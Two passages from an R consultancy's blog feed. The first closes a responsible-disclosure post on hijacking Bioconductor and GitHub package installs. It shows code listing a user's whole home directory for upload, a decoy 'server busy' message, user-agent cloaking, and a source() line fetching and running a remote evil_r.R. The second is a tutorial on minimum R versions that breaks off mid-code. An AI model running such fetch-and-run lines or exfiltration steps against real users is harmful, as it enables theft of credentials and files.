&lt;p&gt;The next step would be to determine which files are on the system. This is particularly easy since R is cross-platform. Using base R, we can list all files under a user&amp;rsquo;s home area with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;~/&amp;#34;&lt;/span&gt;, recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;An attacker could either upload all files or cherry-pick particular directories, such as those that contain security credentials, e.g. ssh keys. With approximately three lines of standard R code, an attacker could upload all files from a user&amp;rsquo;s home area to an external server.&lt;/p&gt;
&lt;p&gt;An attacker could nuance their attack with little thought. For example, a simple message statement at the start of an attack, such as&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;The Bioconductor server is experiencing heavy use today;
hence the installation process will take slightly longer than usual,
please be patient. Sorry for your inconvenience.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;would give the attacker more time. A sophisticated variation would be to delay file uploads until the user is away from the computer, while simultaneously installing Bioconductor and allowing the user to proceed as normal.&lt;/p&gt;
&lt;p&gt;Detecting an attack would also be difficult as an attacker can modify their response based on the user-agent. For example, if in R we run the command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;source&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;http://www.mas.ncl.ac.uk/~ncsg3/R/evil_r.R&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;the server detects an R user agent and returns R code. However, visiting the site via a browser, such as Internet Explorer, will result in a &amp;ldquo;page not found&amp;rdquo; error. An attacker could also cache the IP addresses of visitors. This would enable them to launch an attack the first time a user visits the page, while redirecting all subsequent visits to the correct Bioconductor site.&lt;/p&gt;
&lt;h2 id="other-attack-avenues"&gt;Other Attack Avenues&lt;/h2&gt;
&lt;p&gt;Bioconductor is not the only attack vector that could be exploited. Many R users install the latest versions of packages from GitHub (or other online repositories). The most common method of installing a GitHub package is to use the function &lt;code&gt;install_github()&lt;/code&gt;. The first argument of this function is a combination of the GitHub username and the repository name. For example, to install the latest version of the {ggplot2} package, the user/organisation is {tidyverse} and the repository name is {ggplot2}, so the argument to the &lt;code&gt;install_github()&lt;/code&gt; function would be &lt;strong&gt;tidyverse/ggplot2&lt;/strong&gt;, i.e.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse/ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As with the mechanism employed by Bioconductor, there is nothing wrong with this particular method for package installation. However, as with Bioconductor, many users install packages in this manner, so it would be relatively simple to register a similar username; we have actually registered one such username, similar to {tidyverse}, but didn&amp;rsquo;t create a {ggplot2} repository.&lt;/p&gt;
&lt;p&gt;While the {tidyverse} repository is one of the most popular GitHub repositories, it would be relatively easy to script an attack on &lt;strong&gt;all&lt;/strong&gt; packages hosted in &lt;a href="https://rpkg-api.gepuro.net/rpkg" rel="external"&gt;GitHub&lt;/a&gt;. Creating similar usernames and cloning the targeted repositories would create thousands of possible attack vectors.&lt;/p&gt;
&lt;p&gt;This security vulnerability is implicitly present whenever a user installs packages or libraries. For example, in &lt;a href="https://python.org" rel="external"&gt;Python&lt;/a&gt;, users can install packages via the popular &lt;em&gt;pip&lt;/em&gt; installer. However, a malicious attacker can upload a Python package to the repository that pip installs from, give it a name similar to an existing package, and thereby gain control of a user&amp;rsquo;s system in the same way as with URL hijacking.&lt;/p&gt;
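&lt;p&gt;One way to see how close a squatted name sits to the real thing is to measure the edit distance between them. The following is a minimal sketch using &lt;code&gt;adist()&lt;/code&gt; from base R; the list of known names and the mistyped name are made up for illustration.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;known = c(&amp;#34;ggplot2&amp;#34;, &amp;#34;dplyr&amp;#34;, &amp;#34;tidyr&amp;#34;)  # made-up list of trusted names
requested = &amp;#34;gplot2&amp;#34;                   # name as (mis)typed by a user

# Number of single-character edits between the typed name and each known name
distance = drop(adist(requested, known))

# Known names that are exactly one edit away from what was typed
near_misses = known[distance == 1]
near_misses
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A name that is one edit away from a popular package, but not identical to it, is exactly the kind of name an attacker would register.&lt;/p&gt;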
&lt;h2 id="reporting-vulnerabilities"&gt;Reporting vulnerabilities&lt;/h2&gt;
&lt;p&gt;We actually discovered this issue mid-way through 2017. After contacting the maintainers of Bioconductor, we waited until the mechanism for installing Bioconductor packages was changed to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## A CRAN package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;BiocManager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This happened with the release of R 3.5.0. We then waited a few more months just to be sure.&lt;/p&gt;
&lt;h2 id="shiny-and-r-health-checks"&gt;Shiny and R Health Checks&lt;/h2&gt;
&lt;p&gt;One of our main tasks at &lt;a href="https://www.jumpingrivers.com/consultancy/" rel="external"&gt;Jumping Rivers&lt;/a&gt; is to help set up &lt;a href="https://www.r-project.org/" rel="external"&gt;R&lt;/a&gt; infrastructure and perform R-related security health checks. If you need advice or help, please &lt;a href="https://jumpingrivers.com/contact?utm_source=blog&amp;amp;utm_medium=contact&amp;amp;utm_campaign=2018-bioconductor" rel="external"&gt;contact&lt;/a&gt; us for further details.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What R version do you really need for a package?</title><link>https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/</link><pubDate>Thu, 01 Nov 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; we run a lot of R courses. Some of our most popular courses revolve around the &lt;a href="https://www.tidyverse.org/" rel="external"&gt;tidyverse&lt;/a&gt;, in particular, our &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/"&gt;Data Wrangling in the Tidyverse&lt;/a&gt; and our more advanced &lt;a href="https://www.jumpingrivers.com/training/course/r-tidyverse-programming-purrr-lists/"&gt;purrr&lt;/a&gt; course. We even trained over 200 data scientists at the NHS - see our &lt;a href="https://www.jumpingrivers.com/case-studies/nhs-scotland-r-training" rel="external"&gt;case study&lt;/a&gt; for more details.&lt;/p&gt;
&lt;p&gt;As you can imagine, when giving an on-site course, a reasonable question is what version of R is required for the course. We &lt;strong&gt;always&lt;/strong&gt; have an RStudio cloud back-up, but it’s nice for participants to run code on their own laptop. If participants are to bring their own laptop, it’s trivial for them to update R. But many of our clients are financial institutions or government bodies, where an upgrade is a non-trivial process.&lt;/p&gt;
&lt;p&gt;So, what version of R is required for a &lt;em&gt;tidyverse&lt;/em&gt; course? For the purposes of this blog post, we will define the list of packages we are interested in as&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;purrr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tibble&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;forcats&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The code below will work with &lt;strong&gt;any&lt;/strong&gt; packages of interest. In fact, you can set &lt;code&gt;tidy_pkgs&lt;/code&gt; to all R packages on CRAN; it just takes a while.&lt;/p&gt;
&lt;h2 id="package-descriptions"&gt;Package descriptions&lt;/h2&gt;
&lt;p&gt;In R, there is a handy function called &lt;code&gt;available.packages()&lt;/code&gt; that returns a matrix of details corresponding to packages currently available at one or more repositories. Unfortunately, the format isn’t initially amenable to manipulation. For example, consider the {readr} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr_desc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;available.packages&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I immediately converted the data to a tibble, as that&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;changed the rownames to a proper column&lt;/li&gt;
&lt;li&gt;changed the matrix to a data frame/tibble, which made selecting easier&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Looking at &lt;code&gt;readr_desc&lt;/code&gt;, we see that the package declares a minimum R version&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr_desc&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Depends
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;R (&amp;gt;= 3.0.2)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;but due to the format, it would be difficult to compare to R versions. Also, the list of imports&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr_desc&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Imports
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Rcpp (&amp;gt;= 0.12.0.5), tibble, hms, R6&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;has a similar problem. For example, with the data in this format, it would be difficult to select packages that depend on {tibble}.&lt;/p&gt;
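&lt;p&gt;To make the version problem concrete, here is a minimal base R sketch that pulls the condition and version out of the &lt;code&gt;Depends&lt;/code&gt; string above and compares versions properly. The regular expression is an assumption that only covers the simple &lt;code&gt;R (condition version)&lt;/code&gt; form shown here.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;depends = &amp;#34;R (&amp;gt;= 3.0.2)&amp;#34;

# Capture the condition and the version number from the string
pattern = &amp;#34;^R \\(([^ ]+) +([0-9.]+)\\)$&amp;#34;
parts = regmatches(depends, regexec(pattern, depends))[[1]]
condition = parts[2]
min_version = numeric_version(parts[3])

# Plain strings are compared character by character, so this is TRUE
&amp;#34;3.10.0&amp;#34; &amp;lt; &amp;#34;3.9.0&amp;#34;

# numeric_version() compares component by component, so this is also TRUE
numeric_version(&amp;#34;3.10.0&amp;#34;) &amp;gt; numeric_version(&amp;#34;3.9.0&amp;#34;)

# Would R 3.4.2 satisfy the requirement?
min_version &amp;lt;= numeric_version(&amp;#34;3.4.2&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;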
&lt;h2 id="tidy-package-descriptions"&gt;Tidy package descriptions&lt;/h2&gt;
&lt;p&gt;We currently have five dependency columns&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Imports, Depends, Suggests, Enhances, LinkingTo&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each entry in these columns contains multiple packages, with possible version numbers. To tidy the data set I’m going to create four new columns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;depend_type&lt;/code&gt;: one of Imports, Depends, Suggests, Enhances or LinkingTo&lt;/li&gt;
&lt;li&gt;&lt;code&gt;depend_package&lt;/code&gt;: the package name&lt;/li&gt;
&lt;li&gt;&lt;code&gt;depend_version&lt;/code&gt;: the package version&lt;/li&gt;
&lt;li&gt;&lt;code&gt;depend_condition&lt;/code&gt;: something like equal to, less than or greater than&lt;/li&gt;
&lt;/ul&gt;
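&lt;p&gt;As a rough illustration of that target shape, the sketch below splits a single dependency field into the four columns. It is a simplified stand-in written for this example: the helper name &lt;code&gt;split_dependency_field()&lt;/code&gt; is hypothetical and it is not the function used in the rest of this post.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: one row per package named in a dependency field
split_dependency_field = function(field, type) {
  entries = trimws(strsplit(field, &amp;#34;,&amp;#34;)[[1]])
  # A package name, optionally followed by &amp;#34;(condition version)&amp;#34;
  pattern = &amp;#34;^([^ (]+) *(\\(([^ ]+) +([^)]+)\\))?$&amp;#34;
  m = regmatches(entries, regexec(pattern, entries))
  pick = function(i) {
    value = vapply(m, function(x) x[i], character(1))
    ifelse(nzchar(value), value, NA_character_)  # unmatched groups become NA
  }
  data.frame(
    depend_type = type,
    depend_package = pick(2),
    depend_condition = pick(4),
    depend_version = pick(5),
    stringsAsFactors = FALSE
  )
}

res = split_dependency_field(&amp;#34;Rcpp (&amp;gt;= 0.12.0.5), tibble, hms, R6&amp;#34;, &amp;#34;Imports&amp;#34;)
res
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Packages listed without a version constraint, such as {tibble} here, end up with missing values in the condition and version columns.&lt;/p&gt;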
&lt;p&gt;The hard work is done by the function &lt;code&gt;clean_dependencies()&lt;/code&gt;, which is at the end of the blog post. It essentially just does a bit of string manipulation to separate out the columns. The function works on one dependency type at a time, so we iterate over the dependency types using &lt;code&gt;map_df()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg_deps &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Depends&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Enhances&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Suggests&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Imports&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;LinkingTo&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;available.packages&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_df&lt;/span&gt;(pkg_deps, clean_dependencies, av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; av_pkgs) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;pkg_deps)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Std version: 3.4 -&amp;gt; 3.4.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(depend_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;if_else&lt;/span&gt;(depend_package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;R&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;clean_r_ver&lt;/span&gt;(depend_version),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; depend_version))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Standardise column names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;colnames&lt;/span&gt;(av_pkgs) &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_to_lower&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;colnames&lt;/span&gt;(av_pkgs))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After this step, we now have a tibble with tidy columns:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(package, depend_type, depend_package, depend_version, depend_condition) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 4 x 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package depend_type depend_package depend_version depend_condition&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 A3 Depends R 2.15.0 &amp;gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 abbyyR Depends R 3.2.0 &amp;gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 abc Depends R 2.10.0 &amp;gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 abc.data Depends R 2.10.0 &amp;gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and we can see the minimum R version the package authors have indicated for their package. &lt;strong&gt;However&lt;/strong&gt;, this isn’t necessarily the minimum version actually required. Each package imports a number of other packages, e.g. {readr} imports four packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Imports&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(depend_package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Rcpp&amp;#34; &amp;#34;tibble&amp;#34; &amp;#34;hms&amp;#34; &amp;#34;R6&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and each of those packages also imports other packages. Clearly, the minimum R version required to install {readr} is the maximum of the R versions required by {readr} itself and by all of the packages it imports, directly or indirectly.&lt;/p&gt;
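&lt;p&gt;The idea can be sketched on a toy example. The package names, import lists and R versions below are made up, and &lt;code&gt;all_imports()&lt;/code&gt; is a hypothetical helper. For real packages, &lt;code&gt;tools::package_dependencies()&lt;/code&gt; with &lt;code&gt;recursive = TRUE&lt;/code&gt; can do the recursive lookup.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Made-up data: direct imports and the declared minimum R version of each package
imports = list(pkgA = c(&amp;#34;pkgB&amp;#34;, &amp;#34;pkgC&amp;#34;), pkgB = &amp;#34;pkgC&amp;#34;, pkgC = character(0))
r_min = c(pkgA = &amp;#34;3.1.0&amp;#34;, pkgB = &amp;#34;3.3.0&amp;#34;, pkgC = &amp;#34;3.2.0&amp;#34;)

# Hypothetical helper: collect direct and indirect imports of `pkg`
all_imports = function(pkg, imports, seen = character(0)) {
  for (p in imports[[pkg]]) {
    if (!(p %in% seen)) {
      seen = all_imports(p, imports, c(seen, p))
    }
  }
  seen
}

needed = c(&amp;#34;pkgA&amp;#34;, all_imports(&amp;#34;pkgA&amp;#34;, imports))

# The R version really needed is the largest minimum across the whole set
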